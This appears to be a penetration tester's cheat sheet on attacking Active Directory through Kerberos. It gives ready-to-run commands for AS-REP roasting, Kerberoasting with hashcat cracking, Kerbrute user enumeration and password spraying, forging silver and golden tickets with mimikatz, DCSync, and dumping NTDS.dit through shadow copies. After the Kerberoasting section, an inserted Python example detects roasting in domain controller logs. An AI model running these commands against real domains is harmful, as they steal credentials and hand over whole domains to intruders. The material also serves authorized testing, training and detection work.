Active Directory Authentication

AS-REP roasting (get TGT / password if lucky)

Gets you a TGT (the AS-REP) for the target user; combine it with Kerbrute for username discovery. Sending an AS-REQ is the first step of Kerberos authentication.

Kerberoasting typically requires valid credentials to run the attack. AS-REP roasting instead targets accounts with the property “Do not require Kerberos preauthentication” (UF_DONT_REQUIRE_PREAUTH) set to true.

Check whether the flag is set (PowerView):

Get-DomainUser -PreauthNotRequired

You can obtain usernames, for example by enumerating users through RPC.

Windows alternative: Rubeus

Without password:

impacket-GetNPUsers -no-pass -dc-ip <DC_IP> <DOMAIN>/<USER>

With password:

impacket-GetNPUsers -dc-ip <DC_IP> -request -outputfile hashes.asreproast <DOMAIN>/<USER>

After the attack you can crack the hash with hashcat.

The hash-mode identifier can differ; check hashcat's example_hashes page: https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force

Kerbrute (User enumeration & Password spray)

You can brute force usernames against Kerberos, since the KDC answers differently for existing and non-existing principals. Remember to also look for usernames on other ports.

To get passwords you can then use AS-REP roasting or try the usernames as passwords.

Tool link: https://github.com/ropnop/kerbrute

kerbrute userenum -d <domain> ~/SecLists/Usernames/xato-net-10-million-usernames.txt --dc <DC_IP>

Password spraying:

If you receive a network error, make sure the username and password files are ANSI-encoded.

.\kerbrute_windows_amd64.exe passwordspray -d <DOMAIN> <USERNAMES_FILE> "<PASSWORD>"

Kerberoasting

If you get a KRB_AP_ERR_SKEW error, synchronize Kali's clock with the target machine.

How it works: we request a TGS for a service; part of that ticket is encrypted with the service account's password hash, so it can be cracked offline to recover the account's password and potentially gain control over the domain controller.

Once you have admin or standard user access, look for the supported SPNs and request a TGS ticket for each SPN using the GetUserSPNs tool from Impacket.

impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN>/<USER>

Once you have the TGS hash, feed it to hashcat to recover the service account's password.

hashcat -m 13100 <hash_file> <rockyou_wordlist>
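The two roasting techniques above leave a recognizable trace on the domain controller: AS-REP roasting shows up as 4768 events with pre-authentication type 0, and Kerberoasting as 4769 events requesting RC4 (0x17) service tickets for user-owned SPNs. The following detector is an added example, not part of the original notes; it assumes a simplified, constructed key=value rendering of those events (real events are EVTX/XML and field names differ slightly).

```python
"""Flag AS-REP roasting and Kerberoasting indicators in DC Kerberos audit events.

Added example (not from the original notes). Assumes a simplified, constructed
"<EventID> key=value ..." rendering of Security events 4768 (TGT request) and
4769 (TGS request); real EVTX field names differ slightly.
"""
from collections import Counter

RC4_HMAC = "0x17"   # etype 23: the encryption type both roasting tools request by default
NO_PREAUTH = "0"    # 4768 Pre-Authentication Type 0 = logon without pre-authentication

# Constructed sample events, one per line.
SAMPLE_EVENTS = """\
4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.5
4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.7
4769 TargetUserName=alice@CORP.COM ServiceName=iis_svc TicketEncryptionType=0x17 IpAddress=10.0.0.5
4769 TargetUserName=alice@CORP.COM ServiceName=sql_svc TicketEncryptionType=0x17 IpAddress=10.0.0.5
4769 TargetUserName=alice@CORP.COM ServiceName=FILES01$ TicketEncryptionType=0x12 IpAddress=10.0.0.7
4769 TargetUserName=alice@CORP.COM ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.7
"""

def parse_event(line):
    """Split one constructed event line into a dict of fields plus EventID."""
    event_id, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["EventID"] = event_id
    return fields

def classify(ev):
    """Return a finding label for one event, or None if it looks benign."""
    if (ev["EventID"] == "4768" and ev.get("PreAuthType") == NO_PREAUTH
            and ev.get("TicketEncryptionType") == RC4_HMAC):
        return "asrep-roast-candidate"   # no pre-auth + RC4 = offline-crackable AS-REP
    if ev["EventID"] == "4769" and ev.get("TicketEncryptionType") == RC4_HMAC:
        svc = ev.get("ServiceName", "")
        # Computer accounts ($) and krbtgt have random/long keys and are not the
        # usual Kerberoasting target; RC4 TGS for a user-owned SPN is the signal.
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return "kerberoast-candidate"
    return None

def analyze(text):
    """Map finding label -> sorted list of (source IP, account or service name)."""
    findings = {}
    for line in filter(str.strip, text.splitlines()):
        ev = parse_event(line)
        label = classify(ev)
        if label:
            subject = ev.get("ServiceName") if ev["EventID"] == "4769" else ev.get("TargetUserName")
            findings.setdefault(label, []).append((ev.get("IpAddress"), subject))
    return {k: sorted(v) for k, v in findings.items()}

def rc4_tgs_per_source(text, threshold=2):
    """Source IPs requesting >= threshold RC4 TGS tickets for user SPNs (bulk-request pattern)."""
    counts = Counter(ip for ip, _ in analyze(text).get("kerberoast-candidate", []))
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Tuning the threshold and excluding known-legacy RC4 clients keeps the 4769 rule from firing on ordinary service access.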

Silver ticket

Patched by Microsoft in October 2022.

We can forge our own service tickets to access the resource with any permissions we desire (if a user account's hash is used to create service tickets for it).

In order to create silver ticket we need:

SPN password hash (NTLM)

Mimikatz way (if the service is on the same machine):

privilege::debug
sekurlsa::logonpasswords

Domain SID

whoami /user

The domain SID is the user SID without its last component (the RID, -1102 in the example below):

S-1-5-21-1987371270-658605905-1781884369-1102

Target SPN

The URL (host name) in the case of a web application.

Command:

# /ptt injects the ticket into the memory of the machine we execute it from
kerberos::golden /sid:<DOMAIN_SID> /domain:corp.com /ptt /target:<URL> /service:<SERVICE_TYPE> /rc4:<NTLM> /user:<USER_SET_IN_FORGED_TICKET>

Check if the ticket is in memory:

klist

Example check of HTTP service:

iwr -UseDefaultCredentials http://<url>

Domain Controller Synchronization

Forge a rogue replication (update) request to a domain controller from a user with certain rights.

Required permissions: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes in Filtered Set.

By default Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned.

We can request the credentials of any user in the domain using:

Mimikatz

lsadump::dcsync /user:<DOMAIN>\<USER>

Secretsdump

impacket-secretsdump -just-dc-user <VICTIM_USER> <DOMAIN>/<USER>:"<PASSWORD>"@<DC_IP>

Golden Ticket

Access to all resources in the entire domain.

Kerberos encrypts TGTs with the hash of the krbtgt account. If we take over this account or its hash, we can create our own custom TGTs.

Dump hashes from LSA:

lsadump::lsa /patch

Delete existing Kerberos tickets:

kerberos::purge

Get domain SID:

whoami /user

The domain SID is the user SID without its last component (the RID, -1102 in the example below):

S-1-5-21-1987371270-658605905-1781884369-1102

Create golden ticket:

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_NTLM_HASH> /ptt

Run cmd:

misc::cmd

Shadow Copies

As domain admins we can extract NTDS.dit, the AD database file.

Volume Shadow Copy is a Microsoft backup technology; here we use vshadow.exe to create a snapshot.

Create snapshot:

vshadow.exe -nw -p C:

Once the snapshot has been taken successfully, we should take note of the shadow copy device name.

Copy AD database:

copy <SHADOW_COPY_DEVICE_NAME_PATH>\windows\ntds\ntds.dit c:\ntds.dit.bak

Save the SYSTEM hive (needed to decrypt the database):

reg.exe save hklm\system c:\system.bak

Move these two files to a Kali machine and run secretsdump:

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

This yields every account hash in AD.